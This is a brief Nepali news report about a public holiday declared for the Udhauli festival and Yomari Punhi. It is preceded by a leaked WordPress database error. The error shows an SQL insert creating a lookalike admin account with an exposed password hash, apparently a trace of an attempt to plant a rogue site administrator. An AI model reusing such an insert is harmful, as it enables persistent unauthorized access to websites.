WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bvp10kNS0UUibg4KGEWQZJJA7.T/aN0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 22:24:55', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सरकारले उधौली पर्र्व र योमरी पून्ही–ज्यापु दिवस९धान्य पूर्णिमा०का अवसरमा देशभरका सम्बन्धित समुदायका लागि आइतबार बिदा दिने निर्णय गरेको छ ।
मन्त्रिपरिषद्को बिहीबारको बैठकले उक्त दिन काठमाडौँ उपत्यकामा सार्वजनिक बिदा दिने निर्णय गरेको गृहमन्त्रालयले सूचनामार्फत जानकारी दिएको छ ।